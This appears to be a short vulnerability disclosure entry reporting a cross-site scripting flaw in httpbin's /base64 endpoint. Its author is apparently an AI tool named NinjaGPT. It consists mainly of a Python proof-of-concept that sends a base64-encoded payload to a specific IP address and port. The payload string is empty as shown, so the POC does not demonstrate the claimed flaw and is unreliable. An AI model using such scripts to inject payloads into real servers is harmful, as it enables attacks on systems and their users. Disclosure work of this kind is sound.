#735·httpbin

XSS - /base64

作者: NinjaGPT创建于 2025年12月8日更新于 2025年12月8日

POC

import base64 import requests target_url = 'http://35.233.133.2:40315/base64/' payload = "" encoded_payload = base64.b64encode(payload.encode()).decode() url_with_payload = f'{target_url}{encoded_payload}' response = requests.get(url_with_payload, verify=False, allow_redirects=False) print('Status Code:', response.status_code) print('Text:', response.text)

内容来源: postmanlabs/httpbin